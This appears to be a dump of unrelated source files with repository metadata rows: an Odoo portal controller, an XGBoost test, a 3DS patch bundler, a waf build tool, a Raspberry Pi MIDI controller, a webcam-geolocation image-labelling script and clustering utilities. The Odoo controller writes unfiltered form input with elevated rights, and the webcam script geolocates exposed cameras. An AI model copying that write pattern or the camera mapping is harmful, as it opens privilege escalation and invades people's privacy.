self.pere << "|err|Choix invalide.|ff|"
| bsd-3-clause | 1,578,359,433,482,653,200 | 41.432836 | 79 | 0.669012 | false |
tvtsoft/odoo8 | addons/website_portal/controllers/main.py | 1 | 5029 | # -*- coding: utf-8 -*-
import datetime
from openerp import http
from openerp.http import request
from openerp import tools
from openerp.tools.translate import _
class website_account(http.Controller):
@http.route(['/my', '/my/home'], type='http', auth="public", website=True)
def account(self):
partner = request.env.user.partner_id
values = {
'date': datetime.date.today().strftime('%Y-%m-%d')
}
res_sale_order = request.env['sale.order']
res_invoices = request.env['account.invoice']
quotations = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['sent', 'cancel'])
])
orders = res_sale_order.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['progress', 'manual', 'shipping_except', 'invoice_except', 'done'])
])
invoices = res_invoices.search([
('partner_id.id', '=', partner.id),
('state', 'in', ['open', 'paid', 'cancelled'])
])
values.update({
'quotations': quotations,
'orders': orders,
'invoices': invoices
})
# get customer sales rep
if partner.user_id:
sales_rep = partner.user_id
else:
sales_rep = False
values.update({
'sales_rep': sales_rep,
'company': request.website.company_id,
'user': request.env.user
})
return request.website.render("website_portal.account", values)
@http.route(['/my/orders/<int:order>'], type='http', auth="user", website=True)
def orders_followup(self, order=None):
partner = request.env['res.users'].browse(request.uid).partner_id
domain = [
('partner_id.id', '=', partner.id),
('state', 'not in', ['draft', 'cancel']),
('id', '=', order)
]
order = request.env['sale.order'].search(domain)
invoiced_lines = request.env['account.invoice.line'].search([('invoice_id', 'in', order.invoice_ids.ids)])
order_invoice_lines = {il.product_id.id: il.invoice_id for il in invoiced_lines}
return request.website.render("website_portal.orders_followup", {
'order': order.sudo(),
'order_invoice_lines': order_invoice_lines,
})
@http.route(['/my/account'], type='http', auth='user', website=True)
def details(self, redirect=None, **post):
partner = request.env['res.users'].browse(request.uid).partner_id
values = {
'error': {},
'error_message': []
}
if post:
error, error_message = self.details_form_validate(post)
values.update({'error': error, 'error_message': error_message})
values.update(post)
if not error:
post.update({'zip': post.pop('zipcode', '')})
partner.sudo().write(post)
if redirect:
return request.redirect(redirect)
return request.redirect('/my/home')
countries = request.env['res.country'].sudo().search([])
states = request.env['res.country.state'].sudo().search([])
values.update({
'partner': partner,
'countries': countries,
'states': states,
'has_check_vat': hasattr(request.env['res.partner'], 'check_vat'),
'redirect': redirect,
})
return request.website.render("website_portal.details", values)
def details_form_validate(self, data):
error = dict()
error_message = []
mandatory_billing_fields = ["name", "phone", "email", "street2", "city", "country_id"]
# Validation
for field_name in mandatory_billing_fields:
if not data.get(field_name):
error[field_name] = 'missing'
# email validation
if data.get('email') and not tools.single_email_re.match(data.get('email')):
error["email"] = 'error'
error_message.append(_('Invalid Email! Please enter a valid email address.'))
# vat validation
if data.get("vat") and hasattr(request.env["res.partner"], "check_vat"):
if request.website.company_id.vat_check_vies:
# force full VIES online check
check_func = request.env["res.partner"].vies_vat_check
else:
# quick and partial off-line checksum validation
check_func = request.env["res.partner"].simple_vat_check
vat_country, vat_number = request.env["res.partner"]._split_vat(data.get("vat"))
if not check_func(vat_country, vat_number): # simple_vat_check
error["vat"] = 'error'
# error message for empty required fields
if [err for err in error.values() if err == 'missing']:
error_message.append(_('Some required fields are empty.'))
return error, error_message
| agpl-3.0 | -6,674,752,753,006,959,000 | 37.098485 | 114 | 0.552993 | false |
tks0123456789/XGB_experiments | test_colsample_bylevel.py | 1 | 2864 | import xgboost as xgb
from sklearn.datasets import make_classification
n = 2 ** 15
X, y = make_classification(n_samples=n+1, n_features=10, n_informative=5, n_redundant=5,
shuffle=True, random_state=123)
param = {'objective':'binary:logistic','tree_method':'approx',
'eval_metric':'logloss','seed':123}
print('num_row:%d tree_method:%s' % (n+1, 'approx'))
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n, 'approx'))
dtrain = xgb.DMatrix(X[:n], y[:n])
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
print('num_row:%d tree_method:%s' % (n+1, 'exact'))
param['tree_method'] = 'exact'
dtrain = xgb.DMatrix(X, y)
for cs in [1, 0.1, 0.01]:
print("colsample_bylevel:%.2f" % cs)
param['colsample_bylevel'] = cs
bst = xgb.train(param, dtrain, 1, [(dtrain, 'train')])
"""
num_row:32769 tree_method:approx
colsample_bylevel:1.00
[02:55:11] Tree method is selected to be 'approx'
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.10
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
colsample_bylevel:0.01
[02:55:11] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 116 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.505822
num_row:32768 tree_method:approx
colsample_bylevel:1.00
[02:55:44] Tree method is selected to be 'approx'
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504609
colsample_bylevel:0.10
[02:55:44] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546038
colsample_bylevel:0.01
[02:55:44] dmlc-core/include/dmlc/logging.h:235: [02:55:44] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
num_row:32769 tree_method:exact
colsample_bylevel:1.00
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 118 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.504607
colsample_bylevel:0.10
[03:04:47] src/tree/updater_prune.cc:74: tree pruning end, 1 roots, 114 extra nodes, 0 pruned nodes, max_depth=6
[0] train-logloss:0.546035
colsample_bylevel:0.01
[03:04:47] dmlc-core/include/dmlc/logging.h:235: [03:04:47] src/tree/updater_colmaker.cc:637: Check failed: (n) > (0) colsample_bylevel is too small that no feature can be included
"""
| mit | 2,984,193,907,683,911,700 | 42.393939 | 180 | 0.693785 | false |
Shadowtrance/CakesForeveryWan | patches/bundle.py | 1 | 3840 | from __future__ import print_function
from sys import argv, exit, stderr
from os import mkdir, makedirs, chdir, system, getcwd
from os.path import getsize
from re import search
from json import loads
from struct import pack
from errno import EEXIST
if len(argv) < 5:
print("Usage: bundle.py <info json> <assembly for patches> <build dir> <out dir>", file=stderr)
exit(1)
info = loads(open(argv[1]).read())
patches_file = open(argv[2]).read()
dir_build = argv[3]
dir_out = argv[4]
dir_top = getcwd()
console_dict = {
"o3ds": 0,
"n3ds": 1
}
type_dict = {
"NATIVE_FIRM": 0,
"TWL_FIRM": 1,
"AGB_FIRM": 2
}
options_dict = {
"keyx": 0b00000001,
"emunand": 0b00000010,
"save": 0b00000100
}
for version in info["version_specific"]:
patches = []
patch_count = len(info["patches"])
verdir_build = dir_build + "/" + version["console"] + "-" + version["version"]
verdir_out = dir_out + "/" + version["console"] + "-" + version["version"]
verfile = patches_file
# Create the patches array based on the global and the version-specific array.
for index in range(patch_count):
patch = {}
for array in [info["patches"][index], version["patches"][index]]:
for patch_info in array:
patch[patch_info] = array[patch_info]
patches.append(patch)
# Set the offset right for the patches
for patch in patches:
match = search("(.create.*[\"|']%s[\"|'].*)" % patch["name"], verfile)
if not match:
print("Couldn't find where %s is created." % patch["name"], file=stderr)
exit(1)
toreplace = match.group(0)
replaceby = ".create \"%(name)s\", %(offset)s\n.org %(offset)s" % patch
verfile = verfile.replace(toreplace, replaceby)
# Set the version-specific variables
if "variables" in version:
vartext = ""
for variable in version["variables"]:
vartext += ".definelabel %s, %s\n" % (variable, version["variables"][variable])
verfile = verfile.replace("#!variables\n", vartext)
# Build dir for this version
try:
mkdir(verdir_build)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
chdir(verdir_build)
# Compile it
open("patches.s", "w").write(verfile)
if system("armips patches.s"):
print("Couldn't compile version %s for some reason." % version["version"], file=stderr)
exit(1)
# Bake the cake
# What kind of cake is it?
cake_type = console_dict[version["console"]] << 4 | (type_dict[info["type"]] & 0xF)
# Create the header
cake_header = pack("BBBB", patch_count, int(version["version"], 0), cake_type, len(info["description"]) + 5)
cake_header += (info["description"] + '\0').encode()
# Create the patch headers
patch_header_len = 13
cur_offset = len(cake_header) + patch_header_len * patch_count
for patch in patches:
options = 0
if "options" in patch:
for option in patch["options"]:
if option in options_dict:
options |= options_dict[option]
else:
print("I don't know what option %s means." % option, file=stderr)
exit(1)
patch_len = getsize(patch["name"])
cake_header += pack("IIIB", int(patch["offset"], 0), cur_offset, patch_len, options)
cur_offset += patch_len
# Append the patches
cake = cake_header
for patch in patches:
cake += open(patch["name"], "rb").read()
chdir(dir_top)
try:
makedirs(verdir_out)
except OSError as ex:
if ex.errno == EEXIST:
pass
else:
raise
open(verdir_out + "/" + info["name"] + ".cake", "wb").write(cake)
| gpl-3.0 | -1,199,622,376,286,306,800 | 29.23622 | 112 | 0.580729 | false |
hlange/LogSoCR | .waf/waflib/extras/msvcdeps.py | 1 | 10082 | #!/usr/bin/env python
# encoding: utf-8
# Copyright Garmin International or its subsidiaries, 2012-2013
'''
Off-load dependency scanning from Python code to MSVC compiler
This tool is safe to load in any environment; it will only activate the
MSVC exploits when it finds that a particular taskgen uses MSVC to
compile.
Empirical testing shows about a 10% execution time savings from using
this tool as compared to c_preproc.
The technique of gutting scan() and pushing the dependency calculation
down to post_run() is cribbed from gccdeps.py.
'''
import os
import sys
import tempfile
import threading
from waflib import Context, Errors, Logs, Task, Utils
from waflib.Tools import c_preproc, c, cxx, msvc
from waflib.TaskGen import feature, before_method
lock = threading.Lock()
nodes = {} # Cache the path -> Node lookup
PREPROCESSOR_FLAG = '/showIncludes'
INCLUDE_PATTERN = 'Note: including file:'
# Extensible by outside tools
supported_compilers = ['msvc']
@feature('c', 'cxx')
@before_method('process_source')
def apply_msvcdeps_flags(taskgen):
if taskgen.env.CC_NAME not in supported_compilers:
return
for flag in ('CFLAGS', 'CXXFLAGS'):
if taskgen.env.get_flat(flag).find(PREPROCESSOR_FLAG) < 0:
taskgen.env.append_value(flag, PREPROCESSOR_FLAG)
# Figure out what casing conventions the user's shell used when
# launching Waf
(drive, _) = os.path.splitdrive(taskgen.bld.srcnode.abspath())
taskgen.msvcdeps_drive_lowercase = drive == drive.lower()
def path_to_node(base_node, path, cached_nodes):
# Take the base node and the path and return a node
# Results are cached because searching the node tree is expensive
# The following code is executed by threads, it is not safe, so a lock is needed...
if getattr(path, '__hash__'):
node_lookup_key = (base_node, path)
else:
# Not hashable, assume it is a list and join into a string
node_lookup_key = (base_node, os.path.sep.join(path))
try:
lock.acquire()
node = cached_nodes[node_lookup_key]
except KeyError:
node = base_node.find_resource(path)
cached_nodes[node_lookup_key] = node
finally:
lock.release()
return node
'''
Register a task subclass that has hooks for running our custom
dependency calculations rather than the C/C++ stock c_preproc
method.
'''
def wrap_compiled_task(classname):
derived_class = type(classname, (Task.classes[classname],), {})
def post_run(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).post_run()
if getattr(self, 'cached', None):
return Task.Task.post_run(self)
bld = self.generator.bld
unresolved_names = []
resolved_nodes = []
lowercase = self.generator.msvcdeps_drive_lowercase
correct_case_path = bld.path.abspath()
correct_case_path_len = len(correct_case_path)
correct_case_path_norm = os.path.normcase(correct_case_path)
# Dynamically bind to the cache
try:
cached_nodes = bld.cached_nodes
except AttributeError:
cached_nodes = bld.cached_nodes = {}
for path in self.msvcdeps_paths:
node = None
if os.path.isabs(path):
# Force drive letter to match conventions of main source tree
drive, tail = os.path.splitdrive(path)
if os.path.normcase(path[:correct_case_path_len]) == correct_case_path_norm:
# Path is in the sandbox, force it to be correct. MSVC sometimes returns a lowercase path.
path = correct_case_path + path[correct_case_path_len:]
else:
# Check the drive letter
if lowercase and (drive != drive.lower()):
path = drive.lower() + tail
elif (not lowercase) and (drive != drive.upper()):
path = drive.upper() + tail
node = path_to_node(bld.root, path, cached_nodes)
else:
base_node = bld.bldnode
# when calling find_resource, make sure the path does not begin by '..'
path = [k for k in Utils.split_path(path) if k and k != '.']
while path[0] == '..':
path = path[1:]
base_node = base_node.parent
node = path_to_node(base_node, path, cached_nodes)
if not node:
raise ValueError('could not find %r for %r' % (path, self))
else:
if not c_preproc.go_absolute:
if not (node.is_child_of(bld.srcnode) or node.is_child_of(bld.bldnode)):
# System library
Logs.debug('msvcdeps: Ignoring system include %r', node)
continue
if id(node) == id(self.inputs[0]):
# Self-dependency
continue
resolved_nodes.append(node)
bld.node_deps[self.uid()] = resolved_nodes
bld.raw_deps[self.uid()] = unresolved_names
try:
del self.cache_sig
except AttributeError:
pass
Task.Task.post_run(self)
def scan(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).scan()
resolved_nodes = self.generator.bld.node_deps.get(self.uid(), [])
unresolved_names = []
return (resolved_nodes, unresolved_names)
def sig_implicit_deps(self):
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).sig_implicit_deps()
try:
return Task.Task.sig_implicit_deps(self)
except Errors.WafError:
return Utils.SIG_NIL
def exec_response_command(self, cmd, **kw):
# exec_response_command() is only called from inside msvc.py anyway
assert self.env.CC_NAME in supported_compilers
# Only bother adding '/showIncludes' to compile tasks
if isinstance(self, (c.c, cxx.cxx)):
try:
# The Visual Studio IDE adds an environment variable that causes
# the MS compiler to send its textual output directly to the
# debugging window rather than normal stdout/stderr.
#
# This is unrecoverably bad for this tool because it will cause
# all the dependency scanning to see an empty stdout stream and
# assume that the file being compiled uses no headers.
#
# See http://blogs.msdn.com/b/freik/archive/2006/04/05/569025.aspx
#
# Attempting to repair the situation by deleting the offending
# envvar at this point in tool execution will not be good enough--
# its presence poisons the 'waf configure' step earlier. We just
# want to put a sanity check here in order to help developers
# quickly diagnose the issue if an otherwise-good Waf tree
# is then executed inside the MSVS IDE.
assert 'VS_UNICODE_OUTPUT' not in kw['env']
tmp = None
# This block duplicated from Waflib's msvc.py
if sys.platform.startswith('win') and isinstance(cmd, list) and len(' '.join(cmd)) >= 8192:
program = cmd[0]
cmd = [self.quote_response_command(x) for x in cmd]
(fd, tmp) = tempfile.mkstemp()
os.write(fd, '\r\n'.join(i.replace('\\', '\\\\') for i in cmd[1:]).encode())
os.close(fd)
cmd = [program, '@' + tmp]
# ... end duplication
self.msvcdeps_paths = []
kw['env'] = kw.get('env', os.environ.copy())
kw['cwd'] = kw.get('cwd', os.getcwd())
kw['quiet'] = Context.STDOUT
kw['output'] = Context.STDOUT
out = []
try:
raw_out = self.generator.bld.cmd_and_log(cmd, **kw)
ret = 0
except Errors.WafError as e:
raw_out = e.stdout
ret = e.returncode
for line in raw_out.splitlines():
if line.startswith(INCLUDE_PATTERN):
inc_path = line[len(INCLUDE_PATTERN):].strip()
Logs.debug('msvcdeps: Regex matched %s', inc_path)
self.msvcdeps_paths.append(inc_path)
else:
out.append(line)
# Pipe through the remaining stdout content (not related to /showIncludes)
if self.generator.bld.logger:
self.generator.bld.logger.debug('out: %s' % os.linesep.join(out))
else:
sys.stdout.write(os.linesep.join(out) + os.linesep)
finally:
if tmp:
try:
os.remove(tmp)
except OSError:
pass
return ret
else:
# Use base class's version of this method for linker tasks
return super(derived_class, self).exec_response_command(cmd, **kw)
def can_retrieve_cache(self):
# msvcdeps and netcaching are incompatible, so disable the cache
if self.env.CC_NAME not in supported_compilers:
return super(derived_class, self).can_retrieve_cache()
self.nocache = True # Disable sending the file to the cache
return False
derived_class.post_run = post_run
derived_class.scan = scan
derived_class.sig_implicit_deps = sig_implicit_deps
derived_class.exec_response_command = exec_response_command
derived_class.can_retrieve_cache = can_retrieve_cache
for k in ('c', 'cxx'):
wrap_compiled_task(k)
| agpl-3.0 | 2,727,420,422,639,477,000 | 37.480916 | 111 | 0.573696 | false |
Ppamo/raspi-noisebox-control | noise-control.py | 1 | 2463 | BLINKING_RATE_READY = 1.5
BLINKING_RATE_WAITING = 0.1
BLINKING_RATE_LOADING = 0.3
PIN_BUTTON=3
PIN_BLUE=23
PIN_RED=24
import os,sys,time,signal,subprocess,json
import rtmidi_python as rtmidi
import RPi.GPIO as GPIO
midi_in = [rtmidi.MidiIn()]
attached = set()
attached.add(midi_in[0].ports[0])
p = None
with open('noise-control.json') as map_file:
map = json.load(map_file)
def button_callback(channel):
kill_cmd(None)
GPIO.cleanup()
log('shutdown now!')
os.system("shutdown now -h")
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(PIN_RED, GPIO.OUT)
GPIO.setup(PIN_BLUE, GPIO.OUT)
GPIO.setup(PIN_BUTTON, GPIO.IN, GPIO.PUD_UP)
GPIO.add_event_detect(PIN_BUTTON, GPIO.FALLING, callback=button_callback,bouncetime=500)
def set_led_status(status):
GPIO.output(PIN_RED, status)
GPIO.output(PIN_BLUE, not status)
return not status
def log(message):
print message
def signal_handler(signum, frame):
global blinking_rate
if signum == signal.SIGUSR1:
log ('Child ready')
blinking_rate = BLINKING_RATE_READY
elif signum == signal.SIGUSR2:
log ('Child busy')
blinking_rate = BLINKING_RATE_WAITING
elif signum == signal.SIGINT or signum == signal.SIGQUIT:
log ('good bye!')
GPIO.cleanup()
sys.exit(0)
def exec_cmd(device):
global p
device_name = device.split(' ')[0]
if device_name in map:
p = subprocess.Popen(args = map[device_name])
def kill_cmd(device):
global p
log('killing %d' % p.pid)
if not p is None and p.poll() is None:
p.send_signal(signal.SIGINT)
time.sleep(0.5)
def attach_device(port):
log('attaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
attached.add(port)
exec_cmd(port)
def dettach_device(port):
log('dettaching ' + port)
global blinking_rate
blinking_rate = BLINKING_RATE_LOADING
log('loading')
kill_cmd(port)
attached.remove(port)
log('loading')
blinking_rate = BLINKING_RATE_LOADING
blinking = False
signal.signal(signal.SIGUSR1, signal_handler)
signal.signal(signal.SIGUSR2, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
while True:
# if something has changed in midi ports
if len(set(midi_in[0].ports) ^ attached) > 0:
ports = set(midi_in[0].ports)
# attach if there is new elements
for i in ports - attached:
attach_device(i)
# dettach if necessary
for i in attached - ports:
dettach_device(i)
blinking = set_led_status(blinking)
time.sleep(blinking_rate)
| mit | -6,005,659,446,975,328,000 | 22.457143 | 88 | 0.723508 | false |
rvictorino/webeye | img_recogn.py | 1 | 3053 | from clarifai import rest
from clarifai.rest import ClarifaiApp
import argparse
from urlparse import urlparse
import urllib2
import urllib
import json
import cam_discovery
MAPS_API_KEY = ""
OUTPUT_FILE_PATH = "/var/www/html/webeye/webeye.js"
def get_url_list_from_file(file_path):
file_to_read=open(file_path,'r')
return file_to_read.readlines()
def get_location(uri):
domain = urlparse(uri).netloc.split(":")[0]
result = urllib2.urlopen("http://ip-api.com/json/" + str(domain)).read()
parsed = json.loads(result)
return {"lat": parsed["lat"], "lon": parsed["lon"]}
def generate_map(located_images_list):
url_base = "https://maps.googleapis.com/maps/api/staticmap?"
params = {"key": MAPS_API_KEY, "size": "500x400"}
# generate markers
markers = []
for located_img in located_images_list:
loc = located_img["location"]
markers.append("markers=color:blue%7Clabel:M%7C{0},{1}".format(loc["lat"], loc["lon"]))
final_url = url_base + urllib.urlencode(params) + "&" + "&".join(markers)
return final_url
def generate_JSON_file(located_images_list):
dest_file = open(OUTPUT_FILE_PATH, 'w')
json_data = json.dumps(located_images_list)
print >> dest_file, "var webeye = " + json_data
dest_file.close()
def remove_port_from_url(url):
parsed_url = urlparse(url)
if parsed_url.port == 80:
return parsed_url.scheme + "://" + parsed_url.netloc[:-3] + parsed_url.path
return parsed_url.geturl()
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", help="url to the image to predict")
group.add_argument("-f", help="path to file containing list of image urls")
group.add_argument("-n", type=int, default=6, help="number of url to import")
parser.add_argument("--static", action='store_true', help="output a google static map url")
args = parser.parse_args()
# parse arguments: one url or a list within a file ?
if args.u is not None:
url_list = [args.u]
elif args.f is not None:
url_list = get_url_list_from_file(args.f)
else:
url_list = cam_discovery.get_best_cam_urls(args.n)
# init ClarifAi app
print("Connecting to ClarifAi")
app = ClarifaiApp("", "")
model = app.models.get("general-v1.3")
geo_data = []
# parse each url
for img_url in url_list:
geo_concept = {}
img_url = remove_port_from_url(img_url)
print(img_url)
# get image url
geo_concept["url"] = img_url
# get lat / lon from IP or domain
geo_concept["location"] = get_location(img_url)
# get concepts in image
geo_concept["concepts"] = []
result = model.predict_by_url(url=img_url)
for concept in result["outputs"][0]["data"]["concepts"]:
print("{0:s}: {1:.2f}%".format(concept["name"], concept["value"]*100))
geo_concept["concepts"].append({"concept": str(concept["name"]), "probability": concept["value"]*100})
# feed the list
geo_data.append(geo_concept)
#TODO: use these data to generate a dynamic google map, including concepts data as tooltips
if args.static:
map_url = generate_map(geo_data)
print(map_url)
else:
# dynamic map
generate_JSON_file(geo_data)
| gpl-3.0 | -3,981,476,711,404,548,000 | 27.53271 | 104 | 0.697674 | false |
twankim/weaksemi | utils.py | 1 | 7546 | # -*- coding: utf-8 -*-
# @Author: twankim
# @Date: 2017-05-05 20:22:13
# @Last Modified by: twankim
# @Last Modified time: 2017-10-26 03:25:34
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
def accuracy(y_true,y_pred):
return 100*np.sum(y_true==y_pred)/float(len(y_true))
def mean_accuracy(y_true,y_pred):
labels = np.unique(y_true)
accuracy = np.zeros(len(labels))
hamming = y_true==y_pred
accuracy = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(accuracy)
def error(y_true,y_pred):
return 100*np.sum(y_true!=y_pred)/float(len(y_true))
def mean_error(y_true,y_pred):
labels = np.unique(y_true)
num_error = np.zeros(len(labels))
hamming = y_true!=y_pred
error = [100*np.sum(hamming[y_true==label])/float(np.sum(y_true==label)) \
for label in labels]
return np.mean(error)
# Find best matching permutation of y_pred clustering
# Also need to change mpp of algorithm
def find_permutation(dataset,algo):
# Calculate centers of original clustering
label_org = list(np.unique(dataset.y))
means_org = [np.mean(dataset.X[dataset.y==label,:],axis=0) for label in label_org]
labels_map = {} # Map from algorithm's label to true label
# Initialize label mapping
for label in xrange(algo.k+1):
labels_map[label] = 0
if len(algo.labels)==0:
return algo.y
for label,mpp in zip(algo.labels,algo.mpps):
# Calculate distance between estimated center and true centers
dist = [np.linalg.norm(mpp-mean_org) for mean_org in means_org]
# Assign true cluster label to the algorithm's label
idx_best = np.argmin(dist)
labels_map[label] = label_org[idx_best]
# Remove assigned label from the list
del means_org[idx_best]
del label_org[idx_best]
return [labels_map[y] for y in algo.y]
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def print_eval(eval_metric,res,etas,fname,
is_sum=False,weak='random',params=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_dist'
t_name = weak +' distance'
rep = res.shape[0]
if not is_sum:
df_res = pd.DataFrame(res.mean(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Averaged over {} experiments)>".format(
eval_metric,t_name, rep)
else:
df_res = pd.DataFrame(res.sum(axis=0),
columns=etas,
index=params
)
df_res.index.name=i_name
df_res.columns.name='eta'
print "\n<{}. {}-weak (Total Sum over {} experiments)>".format(
eval_metric,t_name,rep)
print df_res
df_res.to_csv(fname)
# Plot eta v.s. evaluation
# res: rep x len(qs) x len(etas)
def plot_eval(eval_metric,res,etas,fig_name,
is_sum=False,weak='random',params=None,res_org=None):
assert weak in ['random','local','global'], \
"weak must be in ['random','local','global']"
# cmap = plt.cm.get_cmap("jet", len(params)) -> cmap(i_p)
cmap = ['g','r','b','k','y','m','c']
if weak == 'random':
i_name = 'q'
t_name = weak
else:
i_name = 'c_{dist}'
t_name = weak + ' distance'
rep = res.shape[0]
if not is_sum:
res_plt = res.mean(axis=0)
res_org_plt = res_org.mean(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Averaged over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
label=r'SSAC(original) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
else:
res_plt = res.sum(axis=0)
res_org_plt = res_org.sum(axis=0)
f = plt.figure()
plt.title(r"{}. {}-weak (Total sum over {} experiments)".format(
eval_metric,t_name,rep))
for i_p,param in enumerate(params):
plt.plot(etas,res_plt[i_p,:],
'x-',c=cmap[i_p],
label=r'SSAC(ours) ${}={}$'.format(i_name,param))
if res_org is not None:
plt.plot(etas,res_org_plt[i_p,:],
'o--',c=cmap[i_p],
label=r'SSAC(oroginal) ${}={}$'.format(i_name,param))
plt.xlabel(r"$\eta$ (Number of samples per cluster)")
plt.ylabel(eval_metric)
if "accuracy" in eval_metric.lower():
plt.legend(loc=4)
min_val = min(res_plt.min(),res_org_plt.min())
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = min_val-(max_val-min_val)*0.55
ylim_max = max_val+(max_val-min_val)*0.05
elif ("error" in eval_metric.lower()) or ("fail" in eval_metric.lower()):
plt.legend(loc=1)
max_val = max(res_plt.max(),res_org_plt.max())
ylim_min = 0 - max_val*0.1
ylim_max = max_val*1.35
else:
plt.legend(loc=4)
plt.ylim([ylim_min,ylim_max])
plt.xlim([0,np.round(1.2*max(etas))])
f.savefig(fig_name,bbox_inches='tight')
def plot_hist(gammas,min_gamma,max_gamma,fig_name):
rep = len(gammas)
if rep>40:
n_bins = int(rep/20)
else:
n_bins = 10
f = plt.figure()
plt.hist(gammas,normed=False,bins=n_bins)
plt.title(r"Histogram of $\gamma$. min={}, max={} ({} generation)".format(min_gamma,max_gamma,rep))
plt.xlabel(r"$\gamma$")
plt.ylabel("Number of data generations")
f.savefig(fig_name,bbox_inches='tight')
def plot_cluster(X,y_true,y_pred,k,mpps,gamma,title,f_name,verbose,classes=None):
if classes is not None:
classes = classes
else:
classes = range(k+1)
cmap = plt.cm.get_cmap("jet", k+1)
if verbose:
print " ... Plotting"
f = plt.figure(figsize=(14,7))
plt.suptitle(title)
# Plot original clustering (k-means)
plt.subplot(121)
for i in xrange(1,k+1):
idx = y_true==i
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_true,label=classes)
plt.title("True dataset ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot SSAC result
plt.subplot(122)
for i in xrange(0,k+1):
idx = np.array(y_pred)==i
if sum(idx)>0:
plt.scatter(X[idx,0],X[idx,1],c=cmap(i),label=classes[i],alpha=0.7)
# plt.scatter(X[:,0],X[:,1],c=y_pred,label=classes)
plt.title("SSAC result ($\gamma$={:.2f})".format(gamma))
plt.legend()
# Plot estimated cluster centers
for t in xrange(k):
mpp = mpps[t]
plt.plot(mpp[0],mpp[1],'k^',ms=15,alpha=0.7)
f.savefig(f_name,bbox_inches='tight')
plt.close()
| mit | -8,352,230,938,918,783,000 | 33.456621 | 103 | 0.550225 | false |
sparseMCMC/NIPS2015 | experiments/spatial/spatial_demo.py | 1 | 9549 | import numpy as np
import GPy
from mcmcGP import BinnedPoisson, GPMCMC, SGPMCMC, HMC, AHMC
from itertools import product
from IPython import embed
from scipy.cluster.vq import kmeans
import pyhmc
def load_pines():
X = np.load('pines.np')
return X
def build_vb(initialZ, binMids, binSize, counts, seed):
np.random.seed(seed)
lik = BinnedPoisson(binSize)
kern = getKern(False)
return GPy.core.SVGP(X=binMids, Y=counts.reshape(-1,1), Z=initialZ, kernel=kern, likelihood=lik)
def optimize_vb(m, max_iters=1000):
m.Z.fix()
m.kern.fix()
m.optimize('bfgs', max_iters=max_iters, messages=True)
m.Z.unfix()
m.kern.constrain_positive()
m.optimize('bfgs', max_iters=max_iters, messages=True)
return m
def get_samples_vb(m, num_samples):
mu, var = m._raw_predict(m.X)
samples = np.random.randn(mu.shape[0], num_samples)*np.sqrt(var) + mu
return samples
def get_samples_mc(m, samples, numsamples):
ms, vs = [],[]
for s in samples:
m.optimizer_array = s
mui, vi = m.predict_raw(m.X)
vi = np.clip(vi, 0, np.inf)
ms.append(mui); vs.append(vi)
samples = np.hstack([np.random.randn(mu.shape[0], numsamples)*np.sqrt(var) + mu for mu, var in zip(ms, vs)])
return samples
def get_samples_mc_full(m, samples):
Fs = []
for s in samples:
m.optimizer_array = s
Fs.append(m.F)
return np.hstack(Fs)
def getPriors():
return {'rbf_lengthscale': GPy.priors.Gamma(1.75,1.), 'rbf_variance': GPy.priors.Gamma(1.2, 1) }
def getKern(isBayesian):
kern = GPy.kern.RBF(2, lengthscale=1.)+GPy.kern.White(2, 1e-2)
priors = getPriors()
if isBayesian:
kern.rbf.lengthscale.set_prior(priors['rbf_lengthscale'])
kern.rbf.variance.set_prior(priors['rbf_variance'])
kern.white.variance.fix(1e-6)
return kern
def build_mc_sparse(initialZ, binMids, binSize, counts, seed):
